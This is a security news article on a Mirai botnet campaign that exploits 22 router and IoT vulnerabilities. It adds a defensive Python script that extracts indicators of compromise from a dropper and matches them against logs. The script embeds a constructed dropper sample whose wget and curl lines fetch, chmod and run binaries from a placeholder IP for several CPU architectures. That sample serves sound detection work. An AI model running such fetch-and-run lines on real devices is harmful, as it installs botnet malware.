Mirai Botnet’s Rampant Campaign Targets Multiple Router Vulnerabilities

Router malware: Mirai botnet's current campaign targets many vulnerabilities

Researchers at Palo Alto Networks' Unit 42 have identified a new malware campaign that exploits vulnerabilities in Internet of Things (IoT) devices to distribute variants of the Mirai botnet. The researchers list a total of 22 vulnerabilities that the attackers exploit to gain full control of vulnerable devices, which are then added to the botnet and used to launch further attacks, such as Distributed Denial of Service (DDoS) attacks.

In March, Unit 42 researchers discovered a shell script downloader that fetched and ran bot clients built for different processor architectures: several ARM variants, MIPS, SH4, x86, x86_64, ARC, m68k and SPARC. In April, a second campaign reused the same shell script downloader, and the bot clients it delivered were almost identical, leading the analysts to conclude that the same group of cybercriminals is behind both campaigns.

The campaign has continuously added new exploits, letting the attackers target more router models and turn them into drones for the botnet. Based on the observed behaviour and code patterns, the researchers attribute the malware variants to the Mirai family. When executed, the malware prints the message "listening tun0" to the console and ensures that only one instance runs on the device: if a bot process already exists, the new client terminates it and takes its place.

Unlike many other Mirai variants, the examined malware contains no routine for brute-forcing Telnet or SSH logins. Instead, it depends on the botnet operator exploiting the listed vulnerabilities to plant it on new devices. The Unit 42 analysis also provides indicators of compromise (IOCs) together with the list of exploited vulnerabilities and the affected devices or software.
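The multi-architecture shell downloader described above and the IOC list mentioned here suggest a practical task for defenders: pull the download URLs and hosts out of such a dropper and check them against your own logs. The following is an added example, not code from Unit 42 or from the campaign itself. The dropper text, the IP address (a documentation-range address), the file names and the proxy log lines are all constructed to mimic the pattern the report describes; the architecture name table is an assumption about common payload naming, not something the article lists.

```python
"""Extract IOCs from a Mirai-style multi-architecture shell dropper and match
them against log lines.  Added example with constructed inputs; the host,
paths and binary names are placeholders, not real indicators."""
import re
from urllib.parse import urlparse

# CONSTRUCTED sample resembling the structure of such droppers: one fetch-and-run
# line per CPU architecture.  198.51.100.23 is a documentation address.
SAMPLE_DROPPER = r"""
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.23/bins/x86; chmod +x x86; ./x86 router; rm -rf x86
wget http://198.51.100.23/bins/mips; chmod +x mips; ./mips router; rm -rf mips
wget http://198.51.100.23/bins/mpsl; chmod +x mpsl; ./mpsl router; rm -rf mpsl
wget http://198.51.100.23/bins/arm7; chmod +x arm7; ./arm7 router; rm -rf arm7
curl -O http://198.51.100.23/bins/sh4; chmod +x sh4; ./sh4 router; rm -rf sh4
/bin/busybox wget http://198.51.100.23/bins/m68k; chmod +x m68k; ./m68k router
"""

# CONSTRUCTED proxy log lines (timestamp, client, method, target, status).
CONSTRUCTED_PROXY_LOG = [
    "1686000000.123 10.0.0.7 GET http://198.51.100.23/bins/mips 200",
    "1686000001.456 10.0.0.9 GET http://example.org/index.html 200",
    "1686000002.789 10.0.0.7 CONNECT 198.51.100.23:80 200",
]

# Assumed mapping from payload file-name prefixes to the architectures the
# article lists; droppers in the wild use many naming variations.
ARCH_HINTS = {
    "x86_64": "x86_64", "x86": "x86", "i586": "x86", "i686": "x86",
    "mips": "MIPS", "mpsl": "MIPS (little-endian)", "mipsel": "MIPS (little-endian)",
    "arm": "ARM", "arm5": "ARM", "arm6": "ARM", "arm7": "ARM",
    "sh4": "SH4", "arc": "ARC", "m68k": "m68k", "sparc": "SPARC",
}

# Stops at whitespace, ';' and quotes, so "wget URL; chmod" yields only the URL.
URL_RE = re.compile(r"https?://[^\s;\"']+")


def extract_payload_urls(script: str) -> list[str]:
    """Return the download URLs in order of first appearance, without duplicates."""
    seen: list[str] = []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.append(url)
    return seen


def classify_arch(url: str) -> str:
    """Guess the target architecture from the payload's file name."""
    name = urlparse(url).path.rsplit("/", 1)[-1].lower()
    if name in ARCH_HINTS:
        return ARCH_HINTS[name]
    # Longest prefix first so "x86_64" is not swallowed by "x86".
    for key in sorted(ARCH_HINTS, key=len, reverse=True):
        if name.startswith(key):
            return ARCH_HINTS[key]
    return "unknown"


def extract_iocs(script: str) -> dict:
    """Build a small IOC set: payload hosts, full URLs and the architecture per URL."""
    urls = extract_payload_urls(script)
    hosts = {urlparse(u).hostname for u in urls if urlparse(u).hostname}
    return {"urls": urls, "hosts": hosts,
            "arch_by_url": {u: classify_arch(u) for u in urls}}


def match_log_lines(iocs: dict, lines: list[str]) -> list[str]:
    """Return log lines that reference any IOC host or URL (plain substring match)."""
    hits = []
    for line in lines:
        if any(h in line for h in iocs["hosts"]) or any(u in line for u in iocs["urls"]):
            hits.append(line)
    return hits


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_DROPPER)
    for url, arch in iocs["arch_by_url"].items():
        print(f"{arch:22s} {url}")
    print("hosts to block:", sorted(iocs["hosts"]))
    for hit in match_log_lines(iocs, CONSTRUCTED_PROXY_LOG):
        print("suspicious:", hit)
```

The substring matching is deliberately simple so it works on whatever log format you have; the useful part is that the host set catches the CONNECT line that never names a payload URL, which is what you would feed into a firewall block list.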

Devices from APsystems, Arris, D-Link, Flir, Intelbras, Mediatek, Netgear, Telesquare, Tenda and TP-Link, and software such as Engenius Enshare, MVPower, Nagios, Nortek Linear eMerge, Solarview, Vacron and ZeroShell are among the attackers' targets. Generic CCTV/DVR products are also being targeted. Some of the affected devices have reached end-of-life, so they no longer receive updates and the vulnerabilities will not be patched on them. D-Link has announced that US users of affected devices that have reached end-of-life or end-of-service can obtain replacement devices at a reduced price.

A Mirai variant was last covered here in April last year, when cybercriminals exploited the Spring4Shell vulnerability (CVE-2022-22965) to infect devices. Users of devices and software from the affected brands should check whether their products appear on the list, install any available security updates, and replace devices that no longer receive them.